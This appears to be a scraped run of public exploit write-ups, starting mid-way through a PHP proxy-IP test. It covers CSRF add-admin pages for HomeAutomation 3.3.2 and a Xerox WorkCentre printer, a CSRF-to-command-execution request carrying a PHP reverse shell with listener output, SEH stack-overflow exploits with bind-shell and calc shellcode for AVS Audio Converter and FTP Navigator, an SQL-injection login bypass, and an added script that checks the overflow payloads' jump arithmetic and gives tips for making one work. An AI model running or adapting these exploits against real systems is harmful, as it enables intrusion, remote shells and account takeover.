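    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '127.31.33.7, 198.51.100.9',
];
expect(getClientIpAddress($proxied, ['10.0.0.2']) === '198.51.100.9', 'proxy-appended hop is used');

// A trusted proxy forwarding a malformed value falls back to the proxy address.
$garbage = [
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => 'not-an-ip',
];
expect(getClientIpAddress($garbage, ['10.0.0.2']) === '10.0.0.2', 'malformed hop rejected');

echo "all checks passed\n";
```

With no proxy list configured at all, the function degrades to plain REMOTE_ADDR, which is the safe default for a deployment that is not behind a reverse proxy.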
-
HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5558
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php

HomeAutomation v3.3.2 CSRF Add Admin Exploit

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but
is now based on a plugin system and except for Tellstick it also comes
with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls
your devices (switches, dimmers, etc.) based on an advanced scheduling
system, taking into account things like measurements from various sensors.
With the houseplan view you can get a simple overview of the status of
your devices at their location in your house.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5558
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php

06.11.2019

--

<html>
  <body>
    <form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
      <input type="hidden" name="id" value="-1" />
      <input type="hidden" name="action" value="save" />
      <input type="hidden" name="editable" value="2" />
      <input type="hidden" name="username" value="testingus" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="firstname" value="Tester" />
      <input type="hidden" name="lastname" value="Testovski" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="userlevel" value="3" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Addmoi" />
    </form>
  </body>
</html>
-
HomeAutomation 3.3.2 - Remote Code Execution
# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5560
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php

HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but
is now based on a plugin system and except for Tellstick it also comes
with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls
your devices (switches, dimmers, etc.) based on an advanced scheduling
system, taking into account things like measurements from various sensors.
With the houseplan view you can get a simple overview of the status of
your devices at their location in your house.

Desc: The application suffers from an authenticated OS command execution
vulnerability using custom command v0.1 plugin. This can be exploited with
CSRF vulnerability to execute arbitrary shell commands as the web user via
the 'set_command_on' and 'set_command_off' POST parameters in
'/system/systemplugins/customcommand/customcommand.plugin.php' by using an
unsanitized PHP exec() function.

===============================================================================

/system/systemplugins/customcommand/customcommand.plugin.php:
-------------------------------------------------------------

77:  function toggleDevices($devicesToToggle, $statuses) {
78:    $output = array();
79:    $command = "";
80:
81:    foreach($devicesToToggle as $device)
82:    {
83:      $status = $statuses[$device["id"]];
84:      if($status == 0) {
85:        $command = $this->getSettings("command_off");
86:      } else {
87:        $command = $this->getSettings("command_on");
88:      }
89:
90:      if(!empty($command)) {
91:        $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);
92:
93:        exec($command, $output);
94:
95:        SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
96:      }
97:    }
98:
99:    return "";
100: }

===============================================================================

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5560
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php

06.11.2019

--

POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1

plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save

-

lqwrm@metalgear:/$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from localhost 40724 received!
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/homeautomation_v3_3_2
$ exit
lqwrm@metalgear:/$
-
AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
#            Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601

#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
#  - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'bind9999.txt'

try:
    # 0x00400000 [AVSAudioConverter.exe]
    # 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
    #  - The only module that has SafeSEH disabled.
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x00400000 | 0x00f33000 | False  | False   | False | False    | False  |
    #  - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
    offEdx = '\x41'*260
    edx = '\x42\x42\x42\x42'  # EDX overwrite at 260 bytes. EDX=0x42424242
    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
    nSEH = '\x42'*4
    SEH = '\x43'*4
    #  - If the address at offset 308 is not readable, then the program will throw an exception at:
    #      75F9ECE7  3806  cmp byte ptr ds:[esi], al
    #      [!] Access violation when reading [esi]
    #  - If we can get past this exception, we can overwrite EIP at offset 304.
    #  - [esi] must be successfully overwritten so we can put our payload after it.
    offEip = '\x45'*32
    #  - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
    #  - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
    #    to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
    #  - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
    #    ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
    #     0018FA54  45454545  EEEE  // [296]
    #     0018FA58  45454545  EEEE  // [300]
    #     0018FA5C  1006563E  V...  // [304] eip var       # Pointer to 'pop+ret'
    #    *0018FA60  00000000  ....  // [308] esi var       # our esi address gets replaced by 4 nulls
    #     0018FA64  1006A438  8...  // [312] jmpEsp var    # Pointer to 'jmp esp'
    #     0018FA68  E510EC10  ....  // [316] fixStack var  # ASM to fix the Stack so shellcode will work
    # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x10000000 | 0x100a1000 | False  | True    | False | False    | False  |
    # 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    eip = '\x3e\x56\x06\x10'  # pop+ret
    #  - After pop+ret, ESP=0018FA68
    esi = '\x10\x10\x08\x10'  # [AVSAudioEditor5.dll] | .data | RW
    # 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    #  - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
    jmpEsp = '\x38\xa4\x06\x10'  # jmp esp pointer
    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
    fixStack = '\x83\xEC\x10'   # sub esp, 0x10
    fixStack += '\x89\xE5'      # mov ebp, esp
    fixStack += '\x83\xEC\x60'  # sub esp, 0x60

    # msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    shellcode = b""
    shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
    shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
    shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
    shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
    shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
    shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
    shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
    shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
    shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
    shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
    shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
    shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
    shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
    shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
    shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
    shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
    shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
    shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
    shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
    shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
    shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
    shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
    shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
    shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
    shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
    shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
    shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
    shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
    shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
    shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
    shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
    shellcode += b"\x91\xcf\x47"

    payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
    # offsets:  0      260 264  268 272    304 308 312    316      324

    f = open(File, 'w')  # open file for write
    f.write(payload)
    f.close()  # close the file
    print blt + File + " created successfully "
    # root@kali# nc <Victim IP> 9999
    # Microsoft Windows [Version 6.1.7601]
    # C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
    print err + File + ' failed to create'
-
elearning-script 1.0 - Authentication Bypass
# Exploit Title: elearning-script 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-29
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description:
# E Learning Blog developed in raw PHP

# Vulnerability: an attacker can bypass the login page and reach the dashboard page
# Vulnerable file: /login.php
# Parameter & Payload: '=''or'

# Proof of Concept:
http://localhost/elearning-script-master/login.php

POST /elearning-script-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 445
Referer: http://localhost/elearning-script-master/login.php
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
Connection: close
Upgrade-Insecure-Requests: 1

'=''or'
-
FTP Navigator 8.03 - Stack Overflow (SEH)
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)

# Recreate:
#!/usr/bin/python
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open FTP Navigator v8.03
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
#  - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
#  - The program will crash & calculator will open

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'poc.txt'

try:
    nops = '\x90'*400

    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    # x86/alpha_upper succeeded with size 447 (iteration=0)
    shellcode = b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"

    jmp2nops = '\xe8\xff\xff\xff\xff'   # call +4 // This call will land us at the last \xff of our call instruction
    jmp2nops += '\xc3'                  # ret/inc ebx // Since EIP is at \xff after the call, this is interpreted as \xff\xc3 = inc ebx (a nop instruction)
    jmp2nops += '\x59'                  # pop ecx // Pop the address pushed onto the stack by the call instruction into the ECX register
    jmp2nops += '\x31\xd2'              # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer.
    jmp2nops += '\x66\x81\xca\xfc\x0f'  # or dx, 4092 // EDX is now equal to 0x00000ffc
    jmp2nops += '\x66\x29\xd1'          # sub cx, dx // We subtract 4092 bytes from the address in ECX.
                                        #   (16-bit subtraction: only the low word of ECX changes, so the pushed address
                                        #    must have a low word >= 0x0ffc or the borrow is lost and the jump goes wild)
    jmp2nops += '\xff\xe1'              # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled.

    offset = '\x41' * (4112-len(nops+shellcode+jmp2nops))
    nSEH = '\xeb\xeb\x90\x90'  # jmp short 0xeb (-21 from the end of the 2-byte jmp): lands 19 bytes back, at the start of jmp2nops
    # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
    # | Rebase: False | ASLR: False | SafeSEH: False
    # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
    SEH = '\x76\x75\x45'  # SEH 3 byte overwrite

    payload = nops+shellcode+offset+jmp2nops+nSEH+SEH

    f = open(File, 'w')  # open file for write
    f.write(payload)
    f.close()  # close the file
    print blt + File + " created successfully "
except:
    print err + File + ' failed to create'
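Before sending either of boku's payloads it is worth checking the arithmetic behind them: that the nSEH short jump in the FTP Navigator exploit really lands on jmp2nops, that the call/pop ecx/sub cx,dx/jmp ecx sequence really lands inside the NOP sled, and that the AVS Audio Converter chunks really produce the offsets listed in its "# offsets:" comment. The Python 3 script below is an added example and is not part of either exploit. Chunk sizes and opcodes are taken from the two exploits on this page; the shellcode is replaced by constructed filler of the same length, and the buffer base addresses passed to ftp_navigator_landing() are hypothetical stack addresses.

```python
# Added example (Python 3), not part of boku's exploits: verify the layout of the
# FTP Navigator 8.03 and AVS Audio Converter 9.1.2.600 payloads and simulate the
# backward jumps in the FTP Navigator one.

def layout(chunks):
    """Map each named chunk to (offset, length) for an ordered list of (name, bytes)."""
    table, pos = {}, 0
    for name, data in chunks:
        table[name] = (pos, len(data))
        pos += len(data)
    return table

def jmp_short_target(instr_offset, rel8):
    """Target of a 2-byte 'jmp short rel8' located at instr_offset; rel8 is the raw displacement byte."""
    disp = rel8 - 0x100 if rel8 >= 0x80 else rel8
    return instr_offset + 2 + disp

# --- FTP Navigator 8.03: sizes and opcodes as in the exploit ---
NOPS = b"\x90" * 400
SHELLCODE = b"\x41" * 447              # constructed filler; the real payload is 447 bytes of alpha_upper
JMP2NOPS = (b"\xe8\xff\xff\xff\xff"    # call +4: targets its own last 0xff, pushes the address after it
            b"\xc3"                    # executed together with that 0xff as 'inc ebx'
            b"\x59"                    # pop ecx: the address pushed by the call
            b"\x31\xd2"                # xor edx, edx
            b"\x66\x81\xca\xfc\x0f"    # or dx, 0x0ffc (4092)
            b"\x66\x29\xd1"            # sub cx, dx (16-bit: only the low word of ecx changes)
            b"\xff\xe1")               # jmp ecx
PAD = b"\x41" * (4112 - len(NOPS + SHELLCODE + JMP2NOPS))
NSEH = b"\xeb\xeb\x90\x90"             # jmp short 0xeb (-21)
SEH = b"\x76\x75\x45"                  # 0x00457576 pop edx / pop ebx / ret, 3-byte overwrite
FTP_CHUNKS = [("nops", NOPS), ("shellcode", SHELLCODE), ("pad", PAD),
              ("jmp2nops", JMP2NOPS), ("nseh", NSEH), ("seh", SEH)]

def ftp_nseh_target():
    """Buffer offset the nSEH short jump lands on; should equal the start of jmp2nops."""
    t = layout(FTP_CHUNKS)
    return jmp_short_target(t["nseh"][0], NSEH[1])

def ftp_navigator_landing(buffer_base):
    """Simulate call / pop ecx / sub cx,dx / jmp ecx with the buffer at buffer_base (hypothetical).

    Returns (landing_offset, in_sled). Because 'sub cx, dx' is a 16-bit subtraction the trick
    only works when the low word of the pushed address is >= 0x0ffc; otherwise the borrow is
    lost, ecx points far outside the buffer and in_sled is False."""
    t = layout(FTP_CHUNKS)
    pushed = buffer_base + t["jmp2nops"][0] + 5          # return address pushed by the 5-byte call
    ecx = (pushed & 0xFFFF0000) | ((pushed - 4092) & 0xFFFF)
    landing = ecx - buffer_base
    return landing, 0 <= landing < len(NOPS)

# --- AVS Audio Converter 9.1.2.600: chunk lengths as in the exploit ---
AVS_CHUNKS = [("offEdx", b"A" * 260), ("edx", b"B" * 4), ("nSEH", b"B" * 4), ("SEH", b"C" * 4),
              ("offEip", b"E" * 32), ("eip", b"\x3e\x56\x06\x10"), ("esi", b"\x10\x10\x08\x10"),
              ("jmpEsp", b"\x38\xa4\x06\x10"),
              ("fixStack", b"\x83\xEC\x10\x89\xE5\x83\xEC\x60"),
              ("shellcode", b"\x41" * 355)]             # constructed filler for the 355-byte bind shell

def avs_offsets():
    """Offset of every chunk, to compare against the '# offsets:' comment in the exploit."""
    t = layout(AVS_CHUNKS)
    return [t[name][0] for name, _ in AVS_CHUNKS]

if __name__ == "__main__":
    print("FTP Navigator: nSEH jump lands at offset", ftp_nseh_target())
    for base in (0x0018E000, 0x0018F000):                # hypothetical stack addresses
        print("buffer at %#010x -> jmp ecx lands at offset %d, inside NOP sled: %s"
              % ((base,) + ftp_navigator_landing(base)))
    print("AVS offsets:", avs_offsets())
```

With the buffer at 0x0018E000 the jump lands at offset 6, inside the sled; with the buffer at 0x0018F000 the low word of the pushed address is 0x0002, the 16-bit subtraction wraps, and the jump lands roughly 64 KiB past the buffer. That is the one thing to confirm in the debugger (the address popped into ECX) if the original exploit crashes instead of opening calc.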
-
XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version: WorkCentre® 6655
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was found in the Xerox WorkCentre® 6655 printer. The request that adds a user
# through the Device User Database form is captured in an intercepting proxy and turned into the CSRF
# PoC HTML page below. The add-user request is posted to the xerox.set URI.
# (The frmUserName value must be unique.)
# The PoC replays the captured CSRFToken value verbatim, so the attack depends on the device accepting
# that token for a session other than the one it was issued to. Confirm this on the target (replay the
# request with a stale or altered token) before reporting.

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; [email protected]; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
